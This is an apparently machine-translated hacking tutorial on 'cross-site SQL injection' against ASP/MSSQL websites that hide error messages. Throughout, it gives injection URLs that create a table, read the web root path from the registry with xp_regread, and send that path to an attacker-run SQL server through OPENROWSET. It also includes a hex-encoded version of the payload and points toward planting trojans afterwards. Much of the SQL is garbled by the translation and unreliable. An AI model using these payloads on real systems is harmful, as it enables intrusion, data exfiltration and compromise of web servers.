Cross-Site SQL Injection

Source: Firefox Technology Alliance

In the previous phase, when attempting to attack a website, we found that the system of the other party has blocked the error message and used the database connected to the ordinary account, the system also has all patches, Which is troublesome for attack injection .. So I made a kind of "Cross-Site SQL injection" myself "..

The idea is as follows. Since you do not display the error message, can I display it elsewhere? Let SQL write errors to other places...

Since it is the research phase, we 'd better not directly inject the website, but first use the query analyzer to analyze this method ..

First thought:

SQL can connect to external databases ..

Therefore, first use the query analyzer to log on to the database of one of my own virtual hosts (such permissions are relatively small), and then start an SQL server locally, and use the SA identity to create a trail in the SQL event detector.

If you try sp_addmediaserver successfully, it will be the same as operating the local database ..

The user must be sysadmin .. Failed ..

Another idea:

As long as your SQL command is sent, no matter what the execution result is, you only need to receive the command ..

Therefore, a command with a low permission requirement: OPENROWSET for cross-server queries .. This command sends a database command to a remote database and returns the result set .. Therefore, the "event tracking" command is started to monitor the sent commands ..

First, execute create table [dbo]. [laokai] ([cha8] [char] (255) to create a table. The next step is to write the path to the database. Here I will consider directly generating a cross-database script. Easy to execute ..

DECLARE @ result varchar (255) exec master. dbo. xp_regread HKEY_LOCAL_MACHINE, SYSTEMCONTROLSet001ServicesW3SVCParametersVirtual Roots,/, @ result output insert into laokai (cha8) values (SELECT. * from openrowset (SQLOLEDB, your IP address; sa; password, SELECT * FROM pubs. dbo. authors where au_fname = + @ result +) AS );--

What does this code mean? Is to write the website path information into the database .. It is not simply a Write statement. It is written to construct an SQL statement at the same time. The execution result of this statement is to add such a row of records to the cha8 field of the database laokai.

SELECT a. * from openrowset (SQLOLEDB, your IP address; sa; password, SELECT * FROM pubs. dbo. authors where au_fname = C: Inetpub, 1) AS

The C: Inetpub, and 1 are the root directory of the registry record. The last thing to do is:

DECLARE @ a1 char (255) set @ a1 = (SELECT cha8 FROM laokai) exec (@ a1 );--

This is equivalent to executing

SELECT a. * from openrowset (SQLOLEDB, your IP address; sa; password, SELECT * FROM pubs. dbo. authors where au_fname = C: Inetpub, 1) AS

This statement... At the same time, you will be shown on the event detector side

SELECT * FROM pubs. dbo. authors where au_fname = C: Inetpub, 1

The C: Inetpub indicates the website path .. Debugging successful ..

It is now in practice .. A website shields all error messages .. But are there injection points a. asp? Id = 1. How can this problem be solved?

A. asp? Id = 1; create table [dbo]. [laokai] ([cha8] [char] (255 ))--

The returned result is normal. We created a table named laokai with a field named cha8. Then:

A. asp? Id = 1; DECLARE @ result varchar (255) exec master. dbo. xp_regread HKEY_LOCAL_MACHINE, SYSTEMCONTROLSet001ServicesW3SVCParametersVirtual Roots,/, @ result output insert into laokai (cha8) values (SELECT. * from openrowset (SQLOLEDB, your IP address; sa; password, SELECT * FROM pubs. dbo. authors where au_fname = + @ result +) AS );--

Error .. The error message is blocked .. What should I do? After research, it is found that some characters inside, such as the plus sign, need to be converted into hexadecimal notation .. Maybe there is something else to convert .. What should I do?

So I wrote an ASCII hexadecimal conversion tool, converted all the code, and injected it .. (Tool http://www.cha8.com/ascii.rar trouble into the CD, don't let them down, my server can not stand), the last is naturally to execute the above statement ..

A. asp? Id = 1; % 44% 45% 43% 4C % 41% 52% 45% 20% 40% 72% 65% 73% 75% 6C % 74% 20% 76% 61% 72% 63% 68% 61% 72% 28% 32% 35% 35% 29% 20% 65% 78% 65% 63% 20% 61% 6D % 73% 74% 65% 72% 2E % 64% 62% 6F % 2E % 78% 5F % 70% 72% 65% 67% 72% 65% 61% 64% 4B % 20% 5F % 4C % 4F % 27% 4C % 5F % 4D % 41% 43% 48% 49% 4E % 45% 2C % 27% 27% 53% 59% 53% 54% 4D % 5C % 45% 4F % 4E % 43% 4F % 4C % 54% 52% 53% 65% 74% 30% 31% 5C % 53% 65% 72% 76% 69% 63% 65% 5C % 73% 57% 33% 53% 56% 5C % 43% 50% 61% 72% 61% 6D % 65% 74% 65% 72% 5C % 73% 56% 69% 72% 74% 75% 6C % 20% 52% 6F % 6F % 74% 73% 27% 2C % 20% 2F % 27% 2C % 27% 20% 40% 72% 65% 6C % 73% 6F % 75% 74% 20% 75% 74% 70% 75% 6E % 73% 65% 72% 74% 20% 69% 6E % 74% 6F % 20% 6C % 61% 6F % 6B % 61% 69% 20% 28% 63% 68% 61% 38% 29% 20% 6C % 76% 61% 75% 65% 73% 28% 4C % 45% 43% 54% 20% 2E % 2A % 61% 20% 46% 4F % 4D % 52% 4F % 20% 50% 4E % 45% 4F % 52% 57% 53% 45% 54% 4C % 4F % 4C % 45% 44% 42% 27% 2C % 27% 27% 3F % 3F % 27% 49% 50% 27% 3B % 27% 27% 27% 73% 61% 3B % 27% 3F % 3F % 27% 27% 2C % 20% 27% 27% 53% 45% 4C % 45% 43% 54% 2A % 20% 20% 46% 4F % 4D % 52% 20% 70% 75% 62% 2E % 73% 64% 6F % 2E % 62% 61% 75% 74% 6F % 68% 73% 20% 77% 68% 65% 72% 65% 20% 61% 75% 5F % 66% 6E % 61% 6D % 65% 3D % 27% 27% 27% 27% 27% 2B % 20% 20% 40% 72% 65% 73% 75% 6C % 74% 2B % 20% 27% 27% 27% 27% 27% 27% 27% 29% 41% 53% 20% 61% 27% 29% 3B % 2D % 20

Execution successful...

A. asp? Id = 1; DECLARE @ a1 char (255) set @ a1 = (SELECT cha8 FROM laokai) exec (@ a1 );--

The page is still displayed on the website .. However, the event detector on your side will display:

Injection successful .. There are a lot of articles about how to add trojans when you know the absolute path .. I will not describe it here ..
Finally, let's take the data in the database in another way ..

SELECT * FROM pubs. dbo. authors where au_fname = + @ result +, and modify it to insert to add data to the database .. It is okay to keep the @ result independently .. However, there will be errors. Here, an exec C: Inetpub, 1 is left.